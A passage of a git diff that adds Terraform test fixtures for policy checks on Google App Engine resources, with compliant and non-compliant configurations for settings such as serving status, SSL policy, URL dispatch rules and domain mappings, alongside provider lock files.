"zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/project/c.tf b/inputs/gcp/app_engine/app_engine_application/project/c.tf new file mode 100644 index 000000000..41b337252 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/project/c.tf @@ -0,0 +1,4 @@ +resource "google_app_engine_application" "c" { + project = "gcp-project-12345" + location_id = "australia-southeast1" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/project/config.tf b/inputs/gcp/app_engine/app_engine_application/project/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/project/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/project/nc.tf b/inputs/gcp/app_engine/app_engine_application/project/nc.tf new file mode 100644 index 000000000..011e00d52 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/project/nc.tf @@ -0,0 +1,6 @@ +# Describe your resource type here +# Keep "nc" as the name to indicate that this resource and its attributes are non-compliant +resource "google_app_engine_application" "nc" { + project = "invalid-project" + location_id = "australia-southeast1" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/project/plan.json b/inputs/gcp/app_engine/app_engine_application/project/plan.json new file mode 100644 index 000000000..e49b4fa2a Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/project/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/serving_status/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/serving_status/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/serving_status/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/serving_status/c.tf b/inputs/gcp/app_engine/app_engine_application/serving_status/c.tf new file mode 100644 index 000000000..9f21880c5 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/serving_status/c.tf @@ -0,0 +1,5 @@ +resource "google_app_engine_application" "c" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + serving_status = "SERVING" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/serving_status/config.tf b/inputs/gcp/app_engine/app_engine_application/serving_status/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/serving_status/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/serving_status/nc.tf b/inputs/gcp/app_engine/app_engine_application/serving_status/nc.tf new file mode 100644 index 000000000..73deb59e3 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/serving_status/nc.tf @@ -0,0 +1,5 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-project-12345" + location_id = "australia-southeast1" + serving_status = "USER_DISABLED" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/serving_status/plan.json b/inputs/gcp/app_engine/app_engine_application/serving_status/plan.json new file mode 100644 index 000000000..e010856e3 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/serving_status/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application/ssl_policy/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application/ssl_policy/.terraform.lock.hcl new file mode 100644 index 000000000..5698484ba --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/ssl_policy/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.16.0" + hashes = [ + "h1:o+dOw75zzgpJAUdjEa2a2T62OEThcEr52/4CymRAewA=", + "zh:1cd6f0926e5884998965675d3fbdc5e5abd7335d3f5f83571226be7f50f44443", + "zh:2bc3e3db662df08755af37d23c856f0ec3b8474f629f042ad3af228ff1c3cb5a", + "zh:41869013f786bff8c2ba35e203e84b6c3ec9ff623d6cea6796f5f0204719e907", + "zh:493213e16cb8de6a39b0d6b327faab7909f32ad973fb937d2b3bc4faa07c911a", + "zh:5e9df66ddeef9fcf77acd6185fe880e6b3725b98850ea3b47ef726c44dc04a71", + "zh:6b9e8f83316cf660549a4032342107bb41a7e549eba923f69aefa1ae5ab80a3f", + "zh:6da9316ca7c70d4997c4a62cd534f674e02888e351cb189f7b77b5a03e803773", + "zh:7d1b1dc7c04924dd203e9c5d2041fb732b1e2556b4041c9272a786d37924be7c", + "zh:86dcafef126ad72b592582d8fdb2591d8a2cb45ff85e5f5ff0ac76fbbd7be1bb", + "zh:8a8994c67297336ede3ded9d2558104d49de6fdfa85b88dc99b50030d68158cf", + "zh:a67d8b4774cdb45fb13e73e15885e229561a8b8f46d9f0069b81bf4d3ca03c4a", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application/ssl_policy/c.tf b/inputs/gcp/app_engine/app_engine_application/ssl_policy/c.tf new file mode 100644 index 000000000..058ef5826 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/ssl_policy/c.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_application" "c" { + project = "gcp-project-12345" + location_id = "us-central" + + ssl_policy = "DEFAULT" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/ssl_policy/config.tf b/inputs/gcp/app_engine/app_engine_application/ssl_policy/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/ssl_policy/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/ssl_policy/nc.tf b/inputs/gcp/app_engine/app_engine_application/ssl_policy/nc.tf new file mode 100644 index 000000000..ed3c4d607 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application/ssl_policy/nc.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_application" "nc" { + project = "gcp-project-12345" + location_id = "us-central" + + ssl_policy = "SSL_POLICY_UNSPECIFIED" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application/ssl_policy/plan.json b/inputs/gcp/app_engine/app_engine_application/ssl_policy/plan.json new file mode 100644 index 000000000..647251b30 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application/ssl_policy/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/c.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/c.tf new file mode 100644 index 000000000..5fce90e2f --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/c.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application_url_dispatch_rules" "c" { + project = "gcp-project-12345" + dispatch_rules { + domain = "hardhat.pythonanywhere.com" + path = "/*" + service = "default" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/config.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/nc.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/nc.tf new file mode 100644 index 000000000..a55fe6f2f --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application_url_dispatch_rules" "nc" { + project = "gcp-project-12345" + dispatch_rules { + domain = "inavlid-domain.com" + path = "/*" + service = "default" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/plan.json b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/plan.json new file mode 100644 index 000000000..497921d49 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_domain/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/c.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/c.tf new file mode 100644 index 000000000..ff364f338 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/c.tf @@ -0,0 +1,14 @@ +resource "google_app_engine_application_url_dispatch_rules" "c" { + project = "gcp-project-12345" + dispatch_rules { + domain = "*" + path = "/*" + service = "default" + } + + dispatch_rules { + domain = "*" + path = "/admin/*" + service = "admin" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/config.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/nc.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/nc.tf new file mode 100644 index 000000000..9a4b66169 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application_url_dispatch_rules" "nc" { + project = "gcp-project-12345" + dispatch_rules { + domain = "*" + path = "admin/*" + service = "admin" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/plan.json b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/plan.json new file mode 100644 index 000000000..98980258e Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_path/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/c.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/c.tf new file mode 100644 index 000000000..c5d800c77 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/c.tf @@ -0,0 +1,14 @@ +resource "google_app_engine_application_url_dispatch_rules" "c" { + project = "gcp-project12345" + dispatch_rules { + domain = "*" + path = "/*" + service = "default" + } + + dispatch_rules { + domain = "*" + path = "/admin/*" + service = "admin" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/config.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/nc.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/nc.tf new file mode 100644 index 000000000..dd2d94f91 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application_url_dispatch_rules" "nc" { + project = "gcp-project-12345" + dispatch_rules { + domain = "*" + path = "/*" + service = "unauthorized-service" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/plan.json b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/plan.json new file mode 100644 index 000000000..bb2d7f531 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/c.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/c.tf new file mode 100644 index 000000000..eef53664a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/c.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_domain_mapping" "c" { + project = "gcp-project-12345" + domain_name = "hardhatenterprises.com" + + ssl_settings { + ssl_management_type = "AUTOMATIC" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/config.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/nc.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/nc.tf new file mode 100644 index 000000000..313b1447b --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_domain_mapping" "nc" { + project = "gcp-project-12345" + domain_name = "random-unverified-site.com" + + ssl_settings { + ssl_management_type = "AUTOMATIC" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/plan.json b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/plan.json new file mode 100644 index 000000000..90bc8ed8b Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/c.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/c.tf new file mode 100644 index 000000000..8a772ae0d --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/c.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_domain_mapping" "c" { + project = "gcp-project-12345" + domain_name = "verified-domain.com" + override_strategy = "STRICT" + + ssl_settings { + ssl_management_type = "AUTOMATIC" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/config.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/nc.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/nc.tf new file mode 100644 index 000000000..82545b8ba --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/nc.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_domain_mapping" "nc" { + project = "gcp-project-12345" + domain_name = "unverified-domain.com" + override_strategy = "OVERRIDE" + + ssl_settings { + ssl_management_type = "AUTOMATIC" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/plan.json b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/plan.json new file mode 100644 index 000000000..fb1ef2b4d Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + 